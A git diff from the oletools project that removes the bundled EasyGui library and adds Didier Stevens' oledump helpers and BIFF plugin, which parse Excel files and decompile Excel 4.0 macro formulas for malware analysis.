- # for the commandButton, bind activation events to the activation event handler
- commandButton = tempButton
- handler = __buttonEvent
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-#-----------------------------------------------------------------------
-#
-# class EgStore
-#
-#-----------------------------------------------------------------------
-class EgStore:
- r"""
-A class to support persistent storage.
-
-You can use EgStore to support the storage and retrieval
-of user settings for an EasyGui application.
-
-
-# Example A
-#-----------------------------------------------------------------------
-# define a class named Settings as a subclass of EgStore
-#-----------------------------------------------------------------------
-class Settings(EgStore):
-::
- def __init__(self, filename): # filename is required
- #-------------------------------------------------
- # Specify default/initial values for variables that
- # this particular application wants to remember.
- #-------------------------------------------------
- self.userId = ""
- self.targetServer = ""
-
- #-------------------------------------------------
- # For subclasses of EgStore, these must be
- # the last two statements in __init__
- #-------------------------------------------------
- self.filename = filename # this is required
- self.restore() # restore values from the storage file if possible
-
-
-
-# Example B
-#-----------------------------------------------------------------------
-# create settings, a persistent Settings object
-#-----------------------------------------------------------------------
-settingsFile = "myApp_settings.txt"
-settings = Settings(settingsFile)
-
-user = "obama_barak"
-server = "whitehouse1"
-settings.userId = user
-settings.targetServer = server
-settings.store() # persist the settings
-
-# run code that gets a new value for userId, and persist the settings
-user = "biden_joe"
-settings.userId = user
-settings.store()
-
-
-# Example C
-#-----------------------------------------------------------------------
-# recover the Settings instance, change an attribute, and store it again.
-#-----------------------------------------------------------------------
-settings = Settings(settingsFile)
-settings.userId = "vanrossum_g"
-settings.store()
-
-"""
- def __init__(self, filename): # obtaining filename is required
- self.filename = None
- raise NotImplementedError()
-
- def restore(self):
- """
- Set the values of whatever attributes are recoverable
- from the pickle file.
-
- Populate the attributes (the __dict__) of the EgStore object
- from the attributes (the __dict__) of the pickled object.
-
- If the pickled object has attributes that have been initialized
- in the EgStore object, then those attributes of the EgStore object
- will be replaced by the values of the corresponding attributes
- in the pickled object.
-
- If the pickled object is missing some attributes that have
- been initialized in the EgStore object, then those attributes
- of the EgStore object will retain the values that they were
- initialized with.
-
- If the pickled object has some attributes that were not
- initialized in the EgStore object, then those attributes
- will be ignored.
-
- IN SUMMARY:
-
- After the restore() operation, the EgStore object will have all,
- and only, the attributes that it had when it was initialized.
-
- Where possible, those attributes will have values recovered
- from the pickled object.
- """
- if not os.path.exists(self.filename): return self
- if not os.path.isfile(self.filename): return self
-
- try:
- f = open(self.filename,"rb")
- unpickledObject = pickle.load(f)
- f.close()
-
- for key in list(self.__dict__.keys()):
- default = self.__dict__[key]
- self.__dict__[key] = unpickledObject.__dict__.get(key,default)
- except:
- pass
-
- return self
-
- def store(self):
- """
- Save the attributes of the EgStore object to a pickle file.
- Note that if the directory for the pickle file does not already exist,
- the store operation will fail.
- """
- f = open(self.filename, "wb")
- pickle.dump(self, f)
- f.close()
-
-
- def kill(self):
- """
- Delete my persistent file (i.e. pickle file), if it exists.
- """
- if os.path.isfile(self.filename):
- os.remove(self.filename)
- return
-
- def __str__(self):
- """
- return my contents as a string in an easy-to-read format.
- """
- # find the length of the longest attribute name
- longest_key_length = 0
- keys = []
- for key in self.__dict__.keys():
- keys.append(key)
- longest_key_length = max(longest_key_length, len(key))
-
- keys.sort() # sort the attribute names
- lines = []
- for key in keys:
- value = self.__dict__[key]
- key = key.ljust(longest_key_length)
- lines.append("%s : %s\n" % (key,repr(value)) )
- return "".join(lines) # return a string showing the attributes
-
-
-
-
-#-----------------------------------------------------------------------
-#
-# test/demo easygui
-#
-#-----------------------------------------------------------------------
-def egdemo():
- """
- Run the EasyGui demo.
- """
- # clear the console
- writeln("\n" * 100)
-
- intro_message = ("Pick the kind of box that you wish to demo.\n"
- + "\n * Python version " + sys.version
- + "\n * EasyGui version " + egversion
- + "\n * Tk version " + str(TkVersion)
- )
-
- #========================================== END DEMONSTRATION DATA
-
-
- while 1: # do forever
- choices = [
- "msgbox",
- "buttonbox",
- "buttonbox(image) -- a buttonbox that displays an image",
- "choicebox",
- "multchoicebox",
- "textbox",
- "ynbox",
- "ccbox",
- "enterbox",
- "enterbox(image) -- an enterbox that displays an image",
- "exceptionbox",
- "codebox",
- "integerbox",
- "boolbox",
- "indexbox",
- "filesavebox",
- "fileopenbox",
- "passwordbox",
- "multenterbox",
- "multpasswordbox",
- "diropenbox",
- "About EasyGui",
- " Help"
- ]
- choice = choicebox(msg=intro_message
- , title="EasyGui " + egversion
- , choices=choices)
-
- if not choice: return
-
- reply = choice.split()
-
- if reply[0] == "msgbox":
- reply = msgbox("short msg", "This is a long title")
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "About":
- reply = abouteasygui()
-
- elif reply[0] == "Help":
- _demo_help()
-
- elif reply[0] == "buttonbox":
- reply = buttonbox()
- writeln("Reply was: %s" % repr(reply))
-
- title = "Demo of Buttonbox with many, many buttons!"
- msg = "This buttonbox shows what happens when you specify too many buttons."
- reply = buttonbox(msg=msg, title=title, choices=choices)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "buttonbox(image)":
- _demo_buttonbox_with_image()
-
- elif reply[0] == "boolbox":
- reply = boolbox()
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "enterbox":
- image = "python_and_check_logo.gif"
- message = "Enter the name of your best friend."\
- "\n(Result will be stripped.)"
- reply = enterbox(message, "Love!", " Suzy Smith ")
- writeln("Reply was: %s" % repr(reply))
-
- message = "Enter the name of your best friend."\
- "\n(Result will NOT be stripped.)"
- reply = enterbox(message, "Love!", " Suzy Smith ",strip=False)
- writeln("Reply was: %s" % repr(reply))
-
- reply = enterbox("Enter the name of your worst enemy:", "Hate!")
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "enterbox(image)":
- image = "python_and_check_logo.gif"
- message = "What kind of snake is this?"
- reply = enterbox(message, "Quiz",image=image)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "exceptionbox":
- try:
- thisWillCauseADivideByZeroException = 1/0
- except:
- exceptionbox()
-
- elif reply[0] == "integerbox":
- reply = integerbox(
- "Enter a number between 3 and 333",
- "Demo: integerbox WITH a default value",
- 222, 3, 333)
- writeln("Reply was: %s" % repr(reply))
-
- reply = integerbox(
- "Enter a number between 0 and 99",
- "Demo: integerbox WITHOUT a default value"
- )
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "diropenbox" : _demo_diropenbox()
- elif reply[0] == "fileopenbox": _demo_fileopenbox()
- elif reply[0] == "filesavebox": _demo_filesavebox()
-
- elif reply[0] == "indexbox":
- title = reply[0]
- msg = "Demo of " + reply[0]
- choices = ["Choice1", "Choice2", "Choice3", "Choice4"]
- reply = indexbox(msg, title, choices)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "passwordbox":
- reply = passwordbox("Demo of password box WITHOUT default"
- + "\n\nEnter your secret password", "Member Logon")
- writeln("Reply was: %s" % str(reply))
-
- reply = passwordbox("Demo of password box WITH default"
- + "\n\nEnter your secret password", "Member Logon", "alfie")
- writeln("Reply was: %s" % str(reply))
-
- elif reply[0] == "multenterbox":
- msg = "Enter your personal information"
- title = "Credit Card Application"
- fieldNames = ["Name","Street Address","City","State","ZipCode"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multenterbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg = errmsg + ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "": break # no problems found
- fieldValues = multenterbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
-
- elif reply[0] == "multpasswordbox":
- msg = "Enter logon information"
- title = "Demo of multpasswordbox"
- fieldNames = ["Server ID", "User ID", "Password"]
- fieldValues = [] # we start with blanks for the values
- fieldValues = multpasswordbox(msg,title, fieldNames)
-
- # make sure that none of the fields was left blank
- while 1:
- if fieldValues == None: break
- errmsg = ""
- for i in range(len(fieldNames)):
- if fieldValues[i].strip() == "":
- errmsg = errmsg + ('"%s" is a required field.\n\n' % fieldNames[i])
- if errmsg == "": break # no problems found
- fieldValues = multpasswordbox(errmsg, title, fieldNames, fieldValues)
-
- writeln("Reply was: %s" % str(fieldValues))
-
- elif reply[0] == "ynbox":
- title = "Demo of ynbox"
- msg = "Were you expecting the Spanish Inquisition?"
- reply = ynbox(msg, title)
- writeln("Reply was: %s" % repr(reply))
- if reply:
- msgbox("NOBODY expects the Spanish Inquisition!", "Wrong!")
-
- elif reply[0] == "ccbox":
- title = "Demo of ccbox"
- reply = ccbox(msg,title)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "choicebox":
- title = "Demo of choicebox"
- longchoice = "This is an example of a very long option which you may or may not wish to choose."*2
- listChoices = ["nnn", "ddd", "eee", "fff", "aaa", longchoice
- , "aaa", "bbb", "ccc", "ggg", "hhh", "iii", "jjj", "kkk", "LLL", "mmm" , "nnn", "ooo", "ppp", "qqq", "rrr", "sss", "ttt", "uuu", "vvv"]
-
- msg = "Pick something. " + ("A wrapable sentence of text ?! "*30) + "\nA separate line of text."*6
- reply = choicebox(msg=msg, choices=listChoices)
- writeln("Reply was: %s" % repr(reply))
-
- msg = "Pick something. "
- reply = choicebox(msg=msg, title=title, choices=listChoices)
- writeln("Reply was: %s" % repr(reply))
-
- msg = "Pick something. "
- reply = choicebox(msg="The list of choices is empty!", choices=[])
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "multchoicebox":
- listChoices = ["aaa", "bbb", "ccc", "ggg", "hhh", "iii", "jjj", "kkk"
- , "LLL", "mmm" , "nnn", "ooo", "ppp", "qqq"
- , "rrr", "sss", "ttt", "uuu", "vvv"]
-
- msg = "Pick as many choices as you wish."
- reply = multchoicebox(msg,"Demo of multchoicebox", listChoices)
- writeln("Reply was: %s" % repr(reply))
-
- elif reply[0] == "textbox": _demo_textbox(reply[0])
- elif reply[0] == "codebox": _demo_codebox(reply[0])
-
- else:
- msgbox("Choice\n\n" + choice + "\n\nis not recognized", "Program Logic Error")
- return
-
-
-def _demo_textbox(reply):
- text_snippet = ((\
-"""It was the best of times, and it was the worst of times. The rich ate cake, and the poor had cake recommended to them, but wished only for enough cash to buy bread. The time was ripe for revolution! """ \
-*5)+"\n\n")*10
- title = "Demo of textbox"
- msg = "Here is some sample text. " * 16
- reply = textbox(msg, title, text_snippet)
- writeln("Reply was: %s" % str(reply))
-
-def _demo_codebox(reply):
- code_snippet = ("dafsdfa dasflkj pp[oadsij asdfp;ij asdfpjkop asdfpok asdfpok asdfpok"*3) +"\n"+\
-"""# here is some dummy Python code
-for someItem in myListOfStuff:
- do something(someItem)
- do something()
- do something()
- if somethingElse(someItem):
- doSomethingEvenMoreInteresting()
-
-"""*16
- msg = "Here is some sample code. " * 16
- reply = codebox(msg, "Code Sample", code_snippet)
- writeln("Reply was: %s" % repr(reply))
-
-
-def _demo_buttonbox_with_image():
-
- msg = "Do you like this picture?\nIt is "
- choices = ["Yes","No","No opinion"]
-
- for image in [
- "python_and_check_logo.gif"
- ,"python_and_check_logo.jpg"
- ,"python_and_check_logo.png"
- ,"zzzzz.gif"]:
-
- reply=buttonbox(msg + image,image=image,choices=choices)
- writeln("Reply was: %s" % repr(reply))
-
-
-def _demo_help():
- savedStdout = sys.stdout # save the sys.stdout file object
- sys.stdout = capturedOutput = StringIO()
- help("easygui")
- sys.stdout = savedStdout # restore the sys.stdout file object
- codebox("EasyGui Help",text=capturedOutput.getvalue())
-
-def _demo_filesavebox():
- filename = "myNewFile.txt"
- title = "File SaveAs"
- msg ="Save file as:"
-
- f = filesavebox(msg,title,default=filename)
- writeln("You chose to save file: %s" % f)
-
-def _demo_diropenbox():
- title = "Demo of diropenbox"
- msg = "Pick the directory that you wish to open."
- d = diropenbox(msg, title)
- writeln("You chose directory...: %s" % d)
-
- d = diropenbox(msg, title,default="./")
- writeln("You chose directory...: %s" % d)
-
- d = diropenbox(msg, title,default="c:/")
- writeln("You chose directory...: %s" % d)
-
-
-def _demo_fileopenbox():
- msg = "Python files"
- title = "Open files"
- default="*.py"
- f = fileopenbox(msg,title,default=default)
- writeln("You chose to open file: %s" % f)
-
- default="./*.gif"
- filetypes = ["*.jpg",["*.zip","*.tgs","*.gz", "Archive files"],["*.htm", "*.html","HTML files"]]
- f = fileopenbox(msg,title,default=default,filetypes=filetypes)
- writeln("You chose to open file: %s" % f)
-
- """#deadcode -- testing ----------------------------------------
- f = fileopenbox(None,None,default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(None,title,default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(msg,None,default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(default=default)
- writeln("You chose to open file: %s" % f)
-
- f = fileopenbox(default=None)
- writeln("You chose to open file: %s" % f)
- #----------------------------------------------------deadcode """
-
-
-def _dummy():
- pass
-
-EASYGUI_ABOUT_INFORMATION = '''
-========================================================================
-0.96(2010-08-29)
-========================================================================
-This version fixes some problems with version independence.
-
-BUG FIXES
-------------------------------------------------------
- * A statement with Python 2.x-style exception-handling syntax raised
- a syntax error when running under Python 3.x.
- Thanks to David Williams for reporting this problem.
-
- * Under some circumstances, PIL was unable to display non-gif images
- that it should have been able to display.
- The cause appears to be non-version-independent import syntax.
- PIL modules are now imported with a version-independent syntax.
- Thanks to Horst Jens for reporting this problem.
-
-LICENSE CHANGE
-------------------------------------------------------
-Starting with this version, EasyGui is licensed under what is generally known as
-the "modified BSD license" (aka "revised BSD", "new BSD", "3-clause BSD").
-This license is GPL-compatible but less restrictive than GPL.
-Earlier versions were licensed under the Creative Commons Attribution License 2.0.
-
-
-========================================================================
-0.95(2010-06-12)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
- * Previous versions of EasyGui could display only .gif image files using the
- msgbox "image" argument. This version can now display all image-file formats
-   supported by PIL (the Python Imaging Library) if PIL is installed.
- If msgbox is asked to open a non-gif image file, it attempts to import
- PIL and to use PIL to convert the image file to a displayable format.
- If PIL cannot be imported (probably because PIL is not installed)
- EasyGui displays an error message saying that PIL must be installed in order
- to display the image file.
-
- Note that
- http://www.pythonware.com/products/pil/
- says that PIL doesn't yet support Python 3.x.
-
-
-========================================================================
-0.94(2010-06-06)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
- * The codebox and textbox functions now return the contents of the box, rather
- than simply the name of the button ("Yes"). This makes it possible to use
- codebox and textbox as data-entry widgets. A big "thank you!" to Dominic
- Comtois for requesting this feature, patiently explaining his requirement,
- and helping to discover the tkinter techniques to implement it.
-
- NOTE THAT in theory this change breaks backward compatibility. But because
- (in previous versions of EasyGui) the value returned by codebox and textbox
- was meaningless, no application should have been checking it. So in actual
- practice, this change should not break backward compatibility.
-
- * Added support for SPACEBAR to command buttons. Now, when keyboard
- focus is on a command button, a press of the SPACEBAR will act like
- a press of the ENTER key; it will activate the command button.
-
- * Added support for keyboard navigation with the arrow keys (up,down,left,right)
- to the fields and buttons in enterbox, multenterbox and multpasswordbox,
- and to the buttons in choicebox and all buttonboxes.
-
- * added highlightthickness=2 to entry fields in multenterbox and
- multpasswordbox. Now it is easier to tell which entry field has
- keyboard focus.
-
-
-BUG FIXES
-------------------------------------------------------
- * In EgStore, the pickle file is now opened with "rb" and "wb" rather than
- with "r" and "w". This change is necessary for compatibility with Python 3+.
- Thanks to Marshall Mattingly for reporting this problem and providing the fix.
-
- * In integerbox, the actual argument names did not match the names described
-   in the docstring. Thanks to Daniel Zingaro at the University of Toronto for
- reporting this problem.
-
- * In integerbox, the "argLowerBound" and "argUpperBound" arguments have been
- renamed to "lowerbound" and "upperbound" and the docstring has been corrected.
-
- NOTE THAT THIS CHANGE TO THE ARGUMENT-NAMES BREAKS BACKWARD COMPATIBILITY.
- If argLowerBound or argUpperBound are used, an AssertionError with an
- explanatory error message is raised.
-
- * In choicebox, the signature incorrectly showed choicebox as
- accepting a "buttons" argument. The signature has been fixed.
-
-
-========================================================================
-0.93(2009-07-07)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
-
- * Added exceptionbox to display stack trace of exceptions
-
- * modified names of some font-related constants to make it
- easier to customize them
-
-
-========================================================================
-0.92(2009-06-22)
-========================================================================
-
-ENHANCEMENTS
-------------------------------------------------------
-
- * Added EgStore class to provide basic easy-to-use persistence.
-
-BUG FIXES
-------------------------------------------------------
-
- * Fixed a bug that was preventing Linux users from copying text out of
- a textbox and a codebox. This was not a problem for Windows users.
-
-'''
-
-def abouteasygui():
- """
- shows the easygui revision history
- """
- codebox("About EasyGui\n"+egversion,"EasyGui",EASYGUI_ABOUT_INFORMATION)
- return None
-
-
-
-if __name__ == '__main__':
- if True:
- egdemo()
- else:
- # test the new root feature
- root = Tk()
- msg = """This is a test of a main Tk() window in which we will place an easygui msgbox.
- It will be an interesting experiment.\n\n"""
- messageWidget = Message(root, text=msg, width=1000)
- messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
- messageWidget = Message(root, text=msg, width=1000)
- messageWidget.pack(side=TOP, expand=YES, fill=X, padx='3m', pady='3m')
-
-
- msgbox("this is a test of passing in boxRoot", root=root)
- msgbox("this is a second test of passing in boxRoot", root=root)
-
- reply = enterbox("Enter something", root=root)
- writeln("You wrote:", reply)
-
- reply = enterbox("Enter something else", root=root)
- writeln("You wrote:", reply)
- root.destroy()
diff --git a/oletools/thirdparty/easygui/__init__.py b/oletools/thirdparty/oledump/__init__.py
similarity index 100%
rename from oletools/thirdparty/easygui/__init__.py
rename to oletools/thirdparty/oledump/__init__.py
diff --git a/oletools/thirdparty/oledump/oledump_extract.py b/oletools/thirdparty/oledump/oledump_extract.py
new file mode 100644
index 00000000..407d4117
--- /dev/null
+++ b/oletools/thirdparty/oledump/oledump_extract.py
@@ -0,0 +1,53 @@
+#!/usr/bin/env python
+
+# Small extract of oledump.py to be able to run plugin_biff from olevba
+
+__description__ = 'Analyze OLE files (Compound Binary Files)'
+__author__ = 'Didier Stevens'
+__version__ = '0.0.49'
+__date__ = '2020/03/28'
+
+"""
+
+Source code put in public domain by Didier Stevens, no Copyright
+https://DidierStevens.com
+Use at your own risk
+"""
+
+class cPluginParent():
+ macroOnly = False
+ indexQuiet = False
+
+plugins = []
+
+def AddPlugin(cClass):
+ global plugins
+
+ plugins.append(cClass)
+
+
+# CIC: Call If Callable
+def CIC(expression):
+ if callable(expression):
+ return expression()
+ else:
+ return expression
+
+# IFF: IF Function
+def IFF(expression, valueTrue, valueFalse):
+ if expression:
+ return CIC(valueTrue)
+ else:
+ return CIC(valueFalse)
+
+def P23Ord(value):
+ if type(value) == int:
+ return value
+ else:
+ return ord(value)
+
+def P23Chr(value):
+ if type(value) == int:
+ return chr(value)
+ else:
+ return value
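The hunk above ends with Didier Stevens' small Python 2/3 compatibility helpers: `P23Ord`/`P23Chr` normalize the difference in how the two interpreters yield elements when iterating bytes, while `CIC`/`IFF` let an argument be either a plain value or a zero-argument callable. A standalone sketch of the same idiom (the helpers are re-declared here so the snippet runs on its own):

```python
def P23Ord(value):
    # Iterating over bytes yields int on Python 3 but str on Python 2.
    return value if isinstance(value, int) else ord(value)

def P23Chr(value):
    return chr(value) if isinstance(value, int) else value

def CIC(expression):
    # Call If Callable: accept either a plain value or a zero-argument callable.
    return expression() if callable(expression) else expression

def IFF(expression, valueTrue, valueFalse):
    # IF Function: only the selected branch is evaluated when thunks are passed.
    return CIC(valueTrue) if expression else CIC(valueFalse)

data = b'A'
print(P23Ord(data[0]))                    # 65 on both Python 2 and 3
print(P23Chr(65))                         # 'A'
print(IFF(True, 'yes', lambda: 1 // 0))   # 'yes'; the failing thunk never runs
```

In the diff itself `IFF` is mostly called with plain values; the callable form is an option, not a requirement.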
diff --git a/oletools/thirdparty/oledump/plugin_biff.py b/oletools/thirdparty/oledump/plugin_biff.py
new file mode 100644
index 00000000..75021d17
--- /dev/null
+++ b/oletools/thirdparty/oledump/plugin_biff.py
@@ -0,0 +1,1773 @@
+#!/usr/bin/env python
+
+__description__ = 'BIFF plugin for oledump.py'
+__author__ = 'Didier Stevens'
+__version__ = '0.0.15'
+__date__ = '2020/05/22'
+
+# Slightly modified version by Philippe Lagadec to be imported into olevba
+
+"""
+
+Source code put in public domain by Didier Stevens, no Copyright
+https://DidierStevens.com
+Use at your own risk
+
+History:
+ 2014/11/15: start
+ 2014/11/21: changed interface: added options; added options -a (asciidump) and -s (strings)
+ 2017/12/10: 0.0.2 added optparse & option -o
+ 2017/12/12: added option -f
+ 2017/12/13: added 0x support for option -f
+ 2018/10/24: 0.0.3 started coding Excel 4.0 macro support
+ 2018/10/25: continue
+ 2018/10/26: continue
+ 2019/01/05: 0.0.4 added option -x
+ 2019/03/06: 0.0.5 enhanced parsing of formula expressions
+ 2019/11/05: 0.0.6 Python 3 support
+ 2020/02/23: 0.0.7 performance improvement
+ 2020/03/08: 0.0.8 added options -X and -d
+ 2020/03/09: 0.0.9 improved formula parsing; Python 3 bugfixes
+ 2020/03/27: 0.0.10 improved formula parsing and debug modes. (by @JohnLaTwC)
+ 05219f8c047f1dff861634c4b50d4f6978c87c35f4c14d21ee9d757cac9280cf (ptgConcat)
+ 94b26003699efba54ced98006379a230d1154f340589cc89af7d0cbedb861a53 (encoding, ptgFuncVarA, ptgNameX)
+ d3c1627ca2775d98717eb1abf2b70aedf383845d87993c6b924f2f55d9d4d696 (ptgArea)
+ 01761b06c24baa818b0a75059e745871246a5e9c6ce0243ad96e8632342cbb59 (ptgFuncVarA)
+ d3c1627ca2775d98717eb1abf2b70aedf383845d87993c6b924f2f55d9d4d696 (ptgFunc)
+ 1d48a42a0b06a087e966b860c8f293a9bf57da8d70f5f83c61242afc5b81eb4f (=SELECT($B$1:$1000:$1000:$B:$B,$B$1))
+ 2020/04/06: 0.0.11 Python 2 bugfixes; password protect record FILEPASS
+ 2020/05/16: 0.0.12 option -c
+ 2020/05/17: option -r
+ 2020/05/18: continue
+ 2020/05/20: 0.0.13 option -j
+ 2020/05/21: 0.0.14 improved parsing for a83890bbc081b9ec839c9a32ec06eae6f549a0f85fe0a30751ef229a58e440af, bc39d3bb128f329d95393bf0a4f6ec813356e847a00794c18258bfa48df6937f, 002a8371570487bc81eec4aeea9fdfb7
+ 2020/05/22: Python 3 fix STRING record 0x207
+
+
+Todo:
+"""
+
+import struct
+import re
+import optparse
+import json
+
+# Modifications for olevba:
+import sys
+import binascii
+from .oledump_extract import *
+# end modifications
+
+DEFAULT_SEPARATOR = ','
+QUOTE = '"'
+
+def P23Decode(value):
+ if sys.version_info[0] > 2:
+ try:
+ return value.decode('utf-8')
+ except UnicodeDecodeError as u:
+ return value.decode('windows-1252')
+ else:
+ return value
+
+def ToString(value):
+ if isinstance(value, str):
+ return value
+ else:
+ return str(value)
+
+def Quote(value, separator, quote):
+ value = ToString(value)
+ if len(value) > 1 and value[0] == quote and value[-1] == quote:
+ return value
+ if separator in value or value == '':
+ return quote + value + quote
+ else:
+ return value
+
+def MakeCSVLine(row, separator, quote):
+ return separator.join([Quote(value, separator, quote) for value in row])
+
+def CombineHexASCII(hexDump, asciiDump, length):
+ if hexDump == '':
+ return ''
+ return hexDump + ' ' + (' ' * (3 * (length - len(asciiDump)))) + asciiDump
+
+def HexASCII(data, length=16):
+ result = []
+ if len(data) > 0:
+ hexDump = ''
+ asciiDump = ''
+ for i, b in enumerate(data):
+ if i % length == 0:
+ if hexDump != '':
+ result.append(CombineHexASCII(hexDump, asciiDump, length))
+ hexDump = '%08X:' % i
+ asciiDump = ''
+ hexDump += ' %02X' % P23Ord(b)
+ asciiDump += IFF(P23Ord(b) >= 32, P23Chr(b), '.')
+ result.append(CombineHexASCII(hexDump, asciiDump, length))
+ return result
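`HexASCII` renders the classic offset / hex / ASCII dump, one line per 16 bytes. A simplified standalone version (Python 3 only, and unlike the diff, which renders every byte >= 32 literally, this sketch maps everything outside 32..126 to '.'):

```python
def HexASCII(data, length=16):
    # Simplified hex+ASCII dump: one line per `length` bytes, offset first.
    result = []
    for offset in range(0, len(data), length):
        chunk = data[offset:offset + length]
        hexdump = ' '.join('%02X' % b for b in chunk)
        asciidump = ''.join(chr(b) if 32 <= b < 127 else '.' for b in chunk)
        # Pad the hex column so the ASCII column lines up across rows.
        result.append('%08X: %-*s %s' % (offset, 3 * length - 1, hexdump, asciidump))
    return result

for line in HexASCII(b'EXEC calc.exe\x00\x01'):
    print(line)
```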
+
+def StringsASCII(data):
+ return list(map(P23Decode, re.findall(b'[^\x00-\x08\x0A-\x1F\x7F-\xFF]{4,}', data)))
+
+def StringsUNICODE(data):
+ return [P23Decode(foundunicodestring.replace(b'\x00', b'')) for foundunicodestring, dummy in re.findall(b'(([^\x00-\x08\x0A-\x1F\x7F-\xFF]\x00){4,})', data)]
+
+def Strings(data, encodings='sL'):
+ dStrings = {}
+ for encoding in encodings:
+ if encoding == 's':
+ dStrings[encoding] = StringsASCII(data)
+ elif encoding == 'L':
+ dStrings[encoding] = StringsUNICODE(data)
+ return dStrings
+
+def ContainsWP23Ord(word, expression):
+    return struct.pack('<H', word) in expression
+
+# https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/6e5eed10-5b77-43d6-8dd0-37345f8654ad
+def ParseLocRelU(expression):
+ row = P23Ord(expression[0]) + P23Ord(expression[1]) * 0x100
+ column = P23Ord(expression[2]) + P23Ord(expression[3]) * 0x100
+ rowRelative = False #column & 0x8000
+ colRelative = False #column & 0x4000
+ column = column & 0x3FFF
+ if rowRelative:
+ rowindicator = '~'
+ else:
+ rowindicator = ''
+ row += 1
+ if colRelative:
+ colindicator = '~'
+ else:
+ colindicator = ''
+ column += 1
+ return 'R%s%dC%s%d' % (rowindicator, row, colindicator, column)
+
+#https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/6e5eed10-5b77-43d6-8dd0-37345f8654ad
+def ParseLoc(expression, cellrefformat, ignoreRelFlags=False):
+ formatcodes = 'HH'
+ formatsize = struct.calcsize(formatcodes)
+ row, column = struct.unpack(formatcodes, expression[0:formatsize])
+ if ignoreRelFlags:
+ rowRelative = False
+ colRelative = False
+ else:
+ rowRelative = column & 0x8000
+ colRelative = column & 0x4000
+ column = column & 0x3FFF
+ if rowRelative:
+ rowindicator = '~'
+ else:
+ rowindicator = ''
+ row += 1
+ if colRelative:
+ colindicator = '~'
+ else:
+ colindicator = ''
+ column += 1
+ if cellrefformat.upper() == 'RC':
+ result = 'R%s%dC%s%d' % (rowindicator, row, colindicator, column)
+ elif cellrefformat.upper() == 'LN':
+ column -= 1
+ first = int(column / 26)
+ second = column % 26
+ if first == 0:
+ result = ''
+ else:
+ result = chr(first + ord('A'))
+ result += chr(second + ord('A'))
+ result = '%s%d' % (result, row)
+ else:
+ raise Exception('Unknown cell reference format: %s' % cellrefformat)
+ return result, expression[formatsize:]
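`ParseLoc` above decodes a BIFF Loc structure: two 16-bit words, row then column, with the top two bits of the column word flagging row/column-relative references (rendered as '~'). A compact re-statement using an explicit `<HH` little-endian format (the diff relies on native order, which is little-endian on the platforms it targets):

```python
import struct

def ParseLoc(expression, cellrefformat, ignoreRelFlags=False):
    # Loc = uint16 row, uint16 column; bits 15/14 of the column word are the
    # row-relative / column-relative flags, shown as '~' in RC output.
    row, column = struct.unpack('<HH', expression[:4])
    rowRelative = 0 if ignoreRelFlags else column & 0x8000
    colRelative = 0 if ignoreRelFlags else column & 0x4000
    column &= 0x3FFF
    row += 1       # BIFF rows/columns are 0-based; output is 1-based
    column += 1
    if cellrefformat.upper() == 'RC':
        result = 'R%s%dC%s%d' % ('~' if rowRelative else '', row,
                                 '~' if colRelative else '', column)
    elif cellrefformat.upper() == 'LN':
        # Letter-number style (A1, B1, ...), mirroring the diff's arithmetic.
        first, second = divmod(column - 1, 26)
        result = ('' if first == 0 else chr(first + ord('A'))) + chr(second + ord('A'))
        result = '%s%d' % (result, row)
    else:
        raise Exception('Unknown cell reference format: %s' % cellrefformat)
    return result, expression[4:]

print(ParseLoc(struct.pack('<HH', 0, 1), 'RC')[0])       # R1C2
print(ParseLoc(struct.pack('<HH', 0, 1), 'LN')[0])       # B1
print(ParseLoc(struct.pack('<HH', 2, 0x8000), 'RC')[0])  # R~3C1
```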
+
+def StackBinary(stack, operator):
+ if len(stack) < 2:
+ stack.append('*STACKERROR* not enough operands for operator: %s' % operator)
+ else:
+ operand2 = stack.pop()
+ operand1 = stack.pop()
+ stack.append(operand1 + operator + operand2)
+
+def StackFunction(stack, function, arity):
+ if len(stack) < arity:
+ stack.append('*STACKERROR* not enough arguments for function: %s' % function)
+ else:
+ arguments = []
+ for i in range(arity):
+ arguments.insert(0, stack.pop())
+ if function == 'User Defined Function':
+ function = arguments[0]
+ arguments = arguments[1:]
+ stack.append('%s(%s)' % (function, ','.join(arguments)))
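`StackBinary` and `StackFunction` are the core of the formula decompiler: BIFF stores formulas as a postfix (RPN) token stream, so operands are pushed and each operator or function token pops its arguments and pushes back an infix string. A runnable sketch, re-declaring both helpers and decompiling the token stream for `=SUM(1,2)*3`:

```python
def StackBinary(stack, operator):
    # Binary operator token: pop two operands, push the infix rendering.
    if len(stack) < 2:
        stack.append('*STACKERROR* not enough operands for operator: %s' % operator)
        return
    operand2 = stack.pop()
    operand1 = stack.pop()
    stack.append(operand1 + operator + operand2)

def StackFunction(stack, function, arity):
    # Function token: pop `arity` arguments, reversed back into source order.
    if len(stack) < arity:
        stack.append('*STACKERROR* not enough arguments for function: %s' % function)
        return
    arguments = [stack.pop() for _ in range(arity)][::-1]
    if function == 'User Defined Function':
        # For UDF calls the first argument carries the function's own name.
        function, arguments = arguments[0], arguments[1:]
    stack.append('%s(%s)' % (function, ','.join(arguments)))

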